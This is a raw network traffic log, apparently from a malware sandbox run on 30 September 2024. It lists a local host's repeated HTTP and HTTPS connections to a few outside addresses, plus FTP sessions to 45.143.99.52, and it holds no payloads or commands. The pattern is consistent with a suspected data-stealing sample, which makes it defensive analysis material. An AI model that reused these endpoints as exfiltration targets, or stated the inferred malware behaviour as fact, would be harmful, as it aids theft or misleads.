                                                          Sep 30, 2024 15:03:13.846455097 CEST49745443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:13.846506119 CEST44349745188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:13.846585989 CEST49745443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:13.846790075 CEST49745443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:13.846806049 CEST44349745188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:13.899698973 CEST4974380192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:14.274799109 CEST44349744188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:14.274878025 CEST49744443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:14.277059078 CEST49744443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:14.277065039 CEST44349744188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:14.277326107 CEST44349744188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:14.321563005 CEST49744443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:14.328485966 CEST44349745188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:14.329812050 CEST49745443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:14.329837084 CEST44349745188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:14.333494902 CEST49744443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:14.375406027 CEST44349744188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:14.448728085 CEST44349744188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:14.448796988 CEST44349744188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:14.448843002 CEST49744443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:14.482655048 CEST44349745188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:14.482873917 CEST44349745188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:14.482932091 CEST49745443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:14.483344078 CEST49745443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:14.489445925 CEST4974380192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:14.489850998 CEST49744443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:14.491092920 CEST4974780192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:14.494507074 CEST8049743132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:14.494626045 CEST4974380192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:14.494669914 CEST4974180192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:14.497306108 CEST8049747132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:14.497381926 CEST4974780192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:14.497517109 CEST4974780192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:14.499492884 CEST8049741132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:14.502305031 CEST8049747132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:16.208565950 CEST8049741132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:16.259048939 CEST4974180192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:16.270647049 CEST49752443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:16.270685911 CEST44349752188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:16.270746946 CEST49752443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:16.274286032 CEST49752443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:16.274302006 CEST44349752188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:16.759396076 CEST44349752188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:16.800672054 CEST8049747132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:16.801812887 CEST49753443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:16.801856995 CEST44349753188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:16.801933050 CEST49753443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:16.802227020 CEST49753443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:16.802241087 CEST44349753188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:16.805912018 CEST49752443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:16.852797985 CEST4974780192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:17.034744024 CEST49752443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:17.034759998 CEST44349752188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:17.150980949 CEST44349752188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:17.151055098 CEST44349752188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:17.151127100 CEST49752443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:17.151613951 CEST49752443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:17.154633999 CEST4974180192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:17.155554056 CEST4975580192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:17.159816027 CEST8049741132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:17.160337925 CEST8049755132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:17.160425901 CEST4974180192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:17.160470009 CEST4975580192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:17.160518885 CEST4975580192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:17.165216923 CEST8049755132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:17.274993896 CEST44349753188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:17.285339117 CEST49753443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:17.285367966 CEST44349753188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:17.408200026 CEST44349753188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:17.408463955 CEST44349753188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:17.408586025 CEST49753443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:17.408927917 CEST49753443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:17.412256956 CEST4974780192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:17.413548946 CEST4975680192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:17.417306900 CEST8049747132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:17.417366982 CEST4974780192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:17.418303013 CEST8049756132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:17.418373108 CEST4975680192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:17.418443918 CEST4975680192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:17.423135042 CEST8049756132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:20.142450094 CEST8049755132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:20.144246101 CEST49757443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:20.144351959 CEST44349757188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:20.144484997 CEST49757443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:20.144938946 CEST49757443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:20.144968987 CEST44349757188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:20.196573019 CEST4975580192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:20.620522976 CEST44349757188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:20.637419939 CEST49757443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:20.637475967 CEST44349757188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:20.679902077 CEST8049756132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:20.681453943 CEST49758443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:20.681513071 CEST44349758188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:20.681593895 CEST49758443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:20.681819916 CEST49758443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:20.681847095 CEST44349758188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:20.727920055 CEST4975680192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:20.768946886 CEST44349757188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:20.769068956 CEST44349757188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:20.769139051 CEST49757443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:20.769531012 CEST49757443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:20.772475958 CEST4975580192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:20.773596048 CEST4975980192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:20.777623892 CEST8049755132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:20.777697086 CEST4975580192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:20.778548002 CEST8049759132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:20.778613091 CEST4975980192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:20.778690100 CEST4975980192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:20.784143925 CEST8049759132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:21.144295931 CEST44349758188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:21.154117107 CEST49758443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:21.154172897 CEST44349758188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:21.268857956 CEST44349758188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:21.269120932 CEST44349758188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:21.269192934 CEST49758443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:21.269458055 CEST49758443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:21.272243023 CEST4975680192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:21.273211002 CEST4976080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:21.277394056 CEST8049756132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:21.277452946 CEST4975680192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:21.278069973 CEST8049760132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:21.278130054 CEST4976080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:21.278218031 CEST4976080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:21.282912970 CEST8049760132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:24.221577883 CEST8049759132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:24.223360062 CEST49761443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:24.223486900 CEST44349761188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:24.223611116 CEST49761443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:24.224005938 CEST49761443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:24.224042892 CEST44349761188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:24.274728060 CEST4975980192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:24.686182022 CEST44349761188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:24.688103914 CEST49761443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:24.688169003 CEST44349761188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:24.850820065 CEST44349761188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:24.850949049 CEST44349761188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:24.851027966 CEST49761443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:24.851516962 CEST49761443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:24.859719038 CEST4976280192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:24.864566088 CEST8049762132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:24.864650965 CEST4976280192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:24.864725113 CEST4976280192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:24.869568110 CEST8049762132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:25.340111017 CEST8049760132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:25.341710091 CEST49763443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:25.341734886 CEST44349763188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:25.341819048 CEST49763443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:25.342083931 CEST49763443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:25.342098951 CEST44349763188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:25.384167910 CEST4976080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:25.808449984 CEST44349763188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:25.810029030 CEST49763443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:25.810054064 CEST44349763188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:25.987421989 CEST44349763188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:25.987540960 CEST44349763188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:25.987725019 CEST49763443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:25.988173962 CEST49763443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:25.996622086 CEST4976080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:25.997909069 CEST4976480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:26.002291918 CEST8049760132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:26.002368927 CEST4976080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:26.003432989 CEST8049764132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:26.003521919 CEST4976480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:26.003593922 CEST4976480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:26.008338928 CEST8049764132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:27.489059925 CEST8049762132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:27.490556955 CEST49765443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:27.490611076 CEST44349765188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:27.490714073 CEST49765443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:27.490983963 CEST49765443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:27.490998030 CEST44349765188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:27.540317059 CEST4976280192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:27.971052885 CEST44349765188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:27.972723007 CEST49765443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:27.972752094 CEST44349765188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:28.112409115 CEST44349765188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:28.112507105 CEST44349765188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:28.112565041 CEST49765443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:28.127656937 CEST49765443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:28.207456112 CEST8049764132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:28.217713118 CEST49766443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:28.217739105 CEST44349766188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:28.217806101 CEST49766443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:28.218039989 CEST49766443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:28.218050957 CEST44349766188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:28.236593008 CEST4976280192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:28.242002010 CEST8049762132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:28.242067099 CEST4976280192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:28.246906042 CEST4976780192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:28.251919031 CEST8049767132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:28.251996040 CEST4976780192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:28.252671957 CEST4976780192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:28.257458925 CEST8049767132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:28.259073019 CEST4976480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:28.673980951 CEST44349766188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:28.675796032 CEST49766443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:28.675823927 CEST44349766188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:28.824891090 CEST44349766188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:28.824990034 CEST44349766188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:28.825058937 CEST49766443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:28.825440884 CEST49766443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:28.839608908 CEST4976480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:28.844806910 CEST8049764132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:28.844886065 CEST4976480192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:28.846940994 CEST49768443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:28.847014904 CEST44349768149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:28.847105980 CEST49768443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:28.847486973 CEST49768443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:28.847522020 CEST44349768149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:29.461760044 CEST44349768149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:29.461855888 CEST49768443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:29.465687037 CEST49768443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:29.465739012 CEST44349768149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:29.465970039 CEST44349768149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:29.467633009 CEST49768443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:29.515408993 CEST44349768149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:29.704580069 CEST44349768149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:29.704647064 CEST44349768149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:29.704859972 CEST49768443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:29.709539890 CEST49768443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:33.059257984 CEST8049767132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:33.060728073 CEST49769443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:33.060771942 CEST44349769188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:33.060862064 CEST49769443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:33.061156034 CEST49769443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:33.061175108 CEST44349769188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:33.102859020 CEST4976780192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:33.558065891 CEST44349769188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:33.559977055 CEST49769443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:33.560007095 CEST44349769188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:33.711546898 CEST44349769188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:33.711639881 CEST44349769188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:33.711704969 CEST49769443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:33.712739944 CEST49769443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:33.716943026 CEST4976780192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:33.718193054 CEST4977080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:33.722225904 CEST8049767132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:33.722318888 CEST4976780192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:33.723247051 CEST8049770132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:33.723449945 CEST4977080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:33.723587036 CEST4977080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:33.728542089 CEST8049770132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:35.715447903 CEST8049770132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:35.717004061 CEST49771443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:35.717091084 CEST44349771188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:35.717178106 CEST49771443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:35.717503071 CEST49771443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:35.717539072 CEST44349771188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:35.759090900 CEST4977080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:35.982006073 CEST4973880192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:36.186157942 CEST44349771188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:36.189529896 CEST49771443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:36.189587116 CEST44349771188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:36.277112961 CEST4977221192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:36.281913996 CEST214977245.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:36.281990051 CEST4977221192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:36.283337116 CEST4977221192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:36.288451910 CEST214977245.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:36.288505077 CEST4977221192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:36.336365938 CEST44349771188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:36.336448908 CEST44349771188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:36.336514950 CEST49771443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:36.336924076 CEST49771443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:36.340174913 CEST4977080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:36.341339111 CEST4977380192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:36.345518112 CEST8049770132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:36.345628023 CEST4977080192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:36.346400023 CEST8049773132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:36.346472025 CEST4977380192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:36.346575022 CEST4977380192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:36.351578951 CEST8049773132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:38.217669964 CEST8049773132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:38.219554901 CEST49774443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:38.219594002 CEST44349774188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:38.219666004 CEST49774443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:38.220053911 CEST49774443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:38.220069885 CEST44349774188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:38.259083986 CEST4977380192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:38.677580118 CEST44349774188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:38.679126978 CEST49774443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:38.679150105 CEST44349774188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:38.813716888 CEST44349774188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:38.813801050 CEST44349774188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:38.813860893 CEST49774443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:38.814322948 CEST49774443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:38.817261934 CEST4977380192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:38.817959070 CEST4977580192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:38.822416067 CEST8049773132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:38.822485924 CEST4977380192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:38.823086977 CEST8049775132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:38.823149920 CEST4977580192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:38.824012995 CEST4977580192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:38.828932047 CEST8049775132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:39.961122990 CEST8049775132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:39.963042021 CEST49776443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:39.963089943 CEST44349776188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:39.963193893 CEST49776443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:39.970565081 CEST49776443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:39.970585108 CEST44349776188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:40.009097099 CEST4977580192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:40.462877035 CEST44349776188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:40.511313915 CEST49776443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:40.525434971 CEST49776443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:40.525454044 CEST44349776188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:40.638169050 CEST44349776188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:40.638252974 CEST44349776188.114.97.3192.168.2.4
                                                          Sep 30, 2024 15:03:40.638326883 CEST49776443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:40.674525976 CEST49776443192.168.2.4188.114.97.3
                                                          Sep 30, 2024 15:03:40.766993046 CEST4977580192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:40.768040895 CEST49777443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:40.768075943 CEST44349777149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:40.768151045 CEST49777443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:40.768599033 CEST49777443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:40.768614054 CEST44349777149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:40.772281885 CEST8049775132.226.8.169192.168.2.4
                                                          Sep 30, 2024 15:03:40.772337914 CEST4977580192.168.2.4132.226.8.169
                                                          Sep 30, 2024 15:03:41.396680117 CEST44349777149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:41.396747112 CEST49777443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:41.398380995 CEST49777443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:41.398387909 CEST44349777149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:41.398618937 CEST44349777149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:41.400043011 CEST49777443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:41.447402954 CEST44349777149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:41.655468941 CEST44349777149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:41.655527115 CEST44349777149.154.167.220192.168.2.4
                                                          Sep 30, 2024 15:03:41.655616999 CEST49777443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:41.667532921 CEST49777443192.168.2.4149.154.167.220
                                                          Sep 30, 2024 15:03:45.387307882 CEST4977821192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:45.392707109 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:45.392812967 CEST4977821192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:46.016311884 CEST214977845.143.99.52192.168.2.4
                                                          Sep 30, 2024 15:03:46.016669989 CEST4977821192.168.2.445.143.99.52
                                                          Sep 30, 2024 15:03:46.021475077 CEST214977845.143.99.52192.168.2.4
